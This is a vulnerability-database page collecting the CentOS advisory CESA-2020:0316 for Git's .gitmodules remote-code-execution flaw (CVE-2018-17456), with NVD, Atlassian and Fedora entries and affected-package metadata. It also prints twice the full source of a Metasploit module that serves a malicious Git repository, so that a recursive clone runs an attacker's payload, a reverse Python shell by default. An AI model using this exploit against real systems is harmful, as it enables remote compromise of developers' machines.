ID CESA-2020:0316 Type centos Reporter CentOS Project Modified 2020-02-03T17:18:41
Description
CentOS Errata and Security Advisory CESA-2020:0316
Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.
Security Fix(es):
git: arbitrary code execution via .gitmodules (CVE-2018-17456)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2020-February/035619.html
{"id": "CESA-2020:0316", "bulletinFamily": "unix", "title": "emacs, git, gitk, gitweb, perl security update", "description": "**CentOS Errata and Security Advisory** CESA-2020:0316\n\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2020-February/035619.html\n\n**Affected packages:**\nemacs-git\nemacs-git-el\ngit\ngit-all\ngit-cvs\ngit-daemon\ngit-email\ngit-gui\ngit-svn\ngitk\ngitweb\nperl-Git\n\n**Upstream details at:**\n", "published": "2020-02-03T17:18:41", "modified": "2020-02-03T17:18:41", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://lists.centos.org/pipermail/centos-announce/2020-February/035619.html", "reporter": "CentOS Project", "references": ["http://steadfast.net/", "https://access.redhat.com/errata/RHSA-2020:0316"], "cvelist": ["CVE-2018-17456"], "type": "centos", "lastseen": "2020-02-03T22:36:14", "edition": 1, "viewCount": 67, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-17456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/GIT_SUBMODULE_URL_EXEC/", "MSF:EXPLOIT/MULTI/HTTP/GIT_SUBMODULE_URL_EXEC"]}, {"type": "atlassian", "idList": ["ATLASSIAN:SRCTREEWIN-11292", "ATLASSIAN:SRCTREE-6394"]}, {"type": "fedora", "idList": ["FEDORA:360A46406863", "FEDORA:B126C60E1762", "FEDORA:AD7E26075DAB", "FEDORA:59E4260A442B", "FEDORA:9BD26603B268", "FEDORA:59FDC63352B3", "FEDORA:DB3A56048699", "FEDORA:30DC860321BE", "FEDORA:813D86150C93"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310883176", "OPENVAS:1361412562310852170", "OPENVAS:1361412562311220191183", "OPENVAS:1361412562310843657", "OPENVAS:1361412562311220191291", "OPENVAS:1361412562310704311", "OPENVAS:1361412562310882979", "OPENVAS:1361412562310852092", "OPENVAS:1361412562311220181388", "OPENVAS:1361412562310851934"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D64F350BE20BAAEB14556BDB6D8B4C0D", "EXPLOITPACK:2356A63C4E4DC65BBDDE2BC00C9D7F2F"]}, {"type": "slackware", "idList": ["SSA-2018-283-01"]}, {"type": "amazon", "idList": ["ALAS2-2018-1093", "ALAS-2018-1093"]}, {"type": "ubuntu", "idList": ["USN-3791-1"]}, {"type": "nessus", "idList": ["SL_20181031_GIT_ON_SL7_X.NASL", "FEDORA_2018-7D993184F6.NASL", "FREEBSD_PKG_8C08AB4CD06C11E8B35C001B217B3468.NASL", "ORACLELINUX_ELSA-2020-0316.NASL", "SUSE_SU-2018-4009-1.NASL", "SUSE_SU-2018-4088-1.NASL", "FEDORA_2018-D5139C4FD6.NASL", "DEBIAN_DSA-4311.NASL", "FEDORA_2018-42EAB0F5B9.NASL", "EULEROS_SA-2019-1291.NASL"]}, {"type": "redhat", "idList": ["RHSA-2020:0316", "RHSA-2018:3408", "RHSA-2018:3541"]}, {"type": "zdt", "idList": ["1337DAY-ID-31270"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3109-1", "OPENSUSE-SU-2018:4051-1", "OPENSUSE-SU-2018:3178-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:9C6EC2561AEF786EE1E3D4A78891A5F8"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149709", "PACKETSTORM:149836", "PACKETSTORM:150380"]}, {"type": "exploitdb", "idList": ["EDB-ID:45631", "EDB-ID:45548"]}, {"type": "archlinux", "idList": ["ASA-201810-7"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4311-1:A583A"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0316", "ELSA-2018-3408"]}, {"type": "freebsd", "idList": ["8C08AB4C-D06C-11E8-B35C-001B217B3468"]}, {"type": "centos", "idList": ["CESA-2018:3408"]}], "modified": "2020-02-03T22:36:14", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-02-03T22:36:14", "rev": 2}, "vulnersScore": 7.4}, "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "git-daemon-1.7.1-10.el6_10.x86_64.rpm", "packageName": "git-daemon", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "any", "operator": "lt", "packageFilename": "git-1.7.1-10.el6_10.src.rpm", "packageName": "git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-email-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-email", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-email-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-email", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-gui-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-gui", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-gui-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-gui", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-svn-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-svn", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-svn-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-svn", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "git-1.7.1-10.el6_10.i686.rpm", "packageName": "git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "gitk-1.7.1-10.el6_10.noarch.rpm", "packageName": "gitk", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "gitk-1.7.1-10.el6_10.noarch.rpm", "packageName": "gitk", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "emacs-git-1.7.1-10.el6_10.noarch.rpm", "packageName": "emacs-git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "emacs-git-1.7.1-10.el6_10.noarch.rpm", "packageName": "emacs-git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-cvs-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-cvs", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-cvs-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-cvs", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "gitweb-1.7.1-10.el6_10.noarch.rpm", "packageName": "gitweb", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "gitweb-1.7.1-10.el6_10.noarch.rpm", "packageName": "gitweb", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "x86_64", "operator": "lt", "packageFilename": "git-1.7.1-10.el6_10.x86_64.rpm", "packageName": "git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-all-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-all", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "git-all-1.7.1-10.el6_10.noarch.rpm", "packageName": "git-all", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "perl-Git-1.7.1-10.el6_10.noarch.rpm", "packageName": "perl-Git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "perl-Git-1.7.1-10.el6_10.noarch.rpm", "packageName": "perl-Git", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "emacs-git-el-1.7.1-10.el6_10.noarch.rpm", "packageName": "emacs-git-el", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "noarch", "operator": "lt", "packageFilename": "emacs-git-el-1.7.1-10.el6_10.noarch.rpm", "packageName": "emacs-git-el", "packageVersion": "1.7.1-10.el6_10"}, {"OS": "CentOS", "OSVersion": "6", "arch": "i686", "operator": "lt", "packageFilename": "git-daemon-1.7.1-10.el6_10.i686.rpm", "packageName": "git-daemon", "packageVersion": "1.7.1-10.el6_10"}]}
{"cve": [{"lastseen": "2020-12-09T20:25:38", "description": "Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive \"git clone\" of a superproject if a .gitmodules file has a URL field beginning with a '-' character.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-06T14:29:00", "title": "CVE-2018-17456", "type": "cve", "cwe": ["CWE-88"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17456"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:redhat:ansible_tower:3.3", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-17456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17456", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:ansible_tower:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-12T17:13:59", "description": "This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower. When a submodule url which starts with a dash e.g \"-u./payload\" is passed as an argument to git clone, the file \"payload\" inside the repository is executed. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)\n", "published": "2018-10-18T03:02:28", "type": "metasploit", "title": "Malicious Git HTTP Server For CVE-2018-17456", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_SUBMODULE_URL_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',\n 'Description' => %q(\n This module exploits CVE-2018-17456, which affects Git\n versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.\n\n When a submodule url which starts with a dash e.g \"-u./payload\" is passed\n as an argument to git clone, the file \"payload\" inside the repository\n is executed.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised (e.g git clone --recurse-submodules URL)\n ),\n 'Author' => 'timwr',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-17456'],\n ['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],\n ['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],\n ['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],\n ],\n 'DisclosureDate' => '2018-10-05',\n 'Targets' => [\n ['Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {'Compat' => {'PayloadType' => 'python'}}\n }\n ]\n ],\n 'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])\n ]\n )\n end\n\n def setup\n @repo_data = {\n git: { files: {} }\n }\n setup_git\n super\n end\n\n def setup_git\n # URI must start with a /\n unless git_uri && git_uri.start_with?('/')\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n\n payload_content = \"#!/bin/sh\\n#{payload.raw} &\"\n payload_file = Rex::Text.rand_text_alpha(4..6)\n\n submodule_path = datastore['GIT_SUBMODULE']\n if submodule_path.blank?\n submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + \":\" + Rex::Text.rand_text_alpha(2..6).downcase\n end\n unless submodule_path.include?\":\"\n fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')\n end\n\n gitmodules = \"[submodule \\\"#{submodule_path}\\\"]\npath = #{submodule_path}\nurl = -u./#{payload_file}\n\"\n\n sha1, content = build_object('blob', gitmodules)\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n payloadsha1, content = build_object('blob', payload_content)\n @repo_data[:git][:files][\"/objects/#{get_path(payloadsha1)}\"] = content\n\n tree = \"100644 .gitmodules\\0#{[sha1].pack('H*')}\"\n tree += \"100744 #{payload_file}\\0#{[payloadsha1].pack('H*')}\"\n tree += \"160000 #{submodule_path}\\0#{[sha1].pack('H*')}\"\n sha1, content = build_object('tree', tree)\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n hardcoded_uripath(git_uri)\n git_url = URI.parse(get_uri).merge(git_uri)\n print_status(\"Malicious Git URI is #{git_url}\")\n print_status(\"git clone --recurse-submodules #{git_url}\")\n end\n\n # handles git clone\n def on_request_uri(cli, req)\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_submodule_url_exec.rb"}, {"lastseen": "2020-12-29T01:54:46", "description": "This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower. When a submodule url which starts with a dash e.g \"-u./payload\" is passed as an argument to git clone, the file \"payload\" inside the repository is executed. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)\n", "published": "2018-10-18T03:02:28", "type": "metasploit", "title": "Malicious Git HTTP Server For CVE-2018-17456", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_SUBMODULE_URL_EXEC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',\n 'Description' => %q(\n This module exploits CVE-2018-17456, which affects Git\n versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.\n\n When a submodule url which starts with a dash e.g \"-u./payload\" is passed\n as an argument to git clone, the file \"payload\" inside the repository\n is executed.\n\n This module creates a fake git repository which contains a submodule\n containing the vulnerability. The vulnerability is triggered when the\n submodules are initialised (e.g git clone --recurse-submodules URL)\n ),\n 'Author' => 'timwr',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-17456'],\n ['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],\n ['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],\n ['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],\n ],\n 'DisclosureDate' => '2018-10-05',\n 'Targets' => [\n ['Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' => {'Compat' => {'PayloadType' => 'python'}}\n }\n ]\n ],\n 'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])\n ]\n )\n end\n\n def setup\n @repo_data = {\n git: { files: {} }\n }\n setup_git\n super\n end\n\n def setup_git\n # URI must start with a /\n unless git_uri && git_uri.start_with?('/')\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n\n payload_content = \"#!/bin/sh\\n#{payload.raw} &\"\n payload_file = Rex::Text.rand_text_alpha(4..6)\n\n submodule_path = datastore['GIT_SUBMODULE']\n if submodule_path.blank?\n submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + \":\" + Rex::Text.rand_text_alpha(2..6).downcase\n end\n unless submodule_path.include?\":\"\n fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')\n end\n\n gitmodules = \"[submodule \\\"#{submodule_path}\\\"]\npath = #{submodule_path}\nurl = -u./#{payload_file}\n\"\n\n sha1, content = build_object('blob', gitmodules)\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n payloadsha1, content = build_object('blob', payload_content)\n @repo_data[:git][:files][\"/objects/#{get_path(payloadsha1)}\"] = content\n\n tree = \"100644 .gitmodules\\0#{[sha1].pack('H*')}\"\n tree += \"100744 #{payload_file}\\0#{[payloadsha1].pack('H*')}\"\n tree += \"160000 #{submodule_path}\\0#{[sha1].pack('H*')}\"\n sha1, content = build_object('tree', tree)\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n hardcoded_uripath(git_uri)\n git_url = URI.parse(get_uri).merge(git_uri)\n print_status(\"Malicious Git URI is #{git_url}\")\n print_status(\"git clone --recurse-submodules #{git_url}\")\n end\n\n # handles git clone\n def on_request_uri(cli, req)\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/git_submodule_url_exec.rb"}], "atlassian": [{"lastseen": "2020-12-24T14:35:29", "bulletinFamily": "software", "cvelist": ["CVE-2018-17456"], "description": "There was an input validation vulnerability in Sourcetree for macOS via a Git repository with submodules. A remote attacker with permission to commit to a Git repository linked in Sourcetree for macOS is able to able to exploit this issue to gain code execution on the system.\r\nh4. Affected versions:\r\n * Versions of Sourcetree for macOS before version 3.1.1 are affected by this vulnerability\r\n\r\nh4. Fix:\r\n * Upgrade Sourcetree for macOS to version 3.1.1 or higher from [https://www.sourcetreeapp.com/]\r\n\r\nFor additional details, see the full advisory:\u00a0https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html", "edition": 4, "modified": "2019-03-21T01:53:31", "published": "2019-01-23T22:43:28", "id": "ATLASSIAN:SRCTREE-6394", "href": "https://jira.atlassian.com/browse/SRCTREE-6394", "title": "Input validation vulnerability via Git in Sourcetree for Mac - CVE-2018-17456", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T14:35:27", "bulletinFamily": "software", "cvelist": ["CVE-2018-17456"], "description": "There was an input validation vulnerability in Sourcetree for Windows via a Git repository with submodules. A remote attacker with permission to commit to a Git repository linked in Sourcetree for Windows is able to able to exploit this issue to gain code execution on the system.\r\nh4. Affected versions:\r\n * Versions of Sourcetree for Windows before version 3.0.17 are affected by this vulnerability\r\n\r\nh4. Fix:\r\n * Upgrade Sourcetree for Windows to version 3.0.17 or higher from\u00a0[https://www.sourcetreeapp.com/]\r\n\r\nFor additional details, see the full advisory:\u00a0https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html", "edition": 3, "modified": "2019-03-07T00:38:14", "published": "2019-01-23T22:56:09", "id": "ATLASSIAN:SRCTREEWIN-11292", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-11292", "title": "Input validation vulnerability via Git in Sourcetree for Windows - CVE-2018-17456", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "modified": "2018-10-09T00:08:13", "published": "2018-10-09T00:08:13", "id": "FEDORA:9BD26603B268", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: git-2.19.1-1.fc29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "modified": "2018-10-09T00:08:31", "published": "2018-10-09T00:08:31", "id": "FEDORA:30DC860321BE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: libgit2-0.27.5-1.fc29", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456"], "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "modified": "2018-10-10T22:47:45", "published": "2018-10-10T22:47:45", "id": "FEDORA:59E4260A442B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2018-19486"], "description": "Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. The git rpm installs common set of tools which are usually using with small amount of dependencies. To install all git packages, including tools for integrating with other SCMs, install the git-all meta-package. ", "modified": "2018-11-28T02:46:33", "published": "2018-11-28T02:46:33", "id": "FEDORA:360A46406863", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: git-2.17.2-2.fc28", 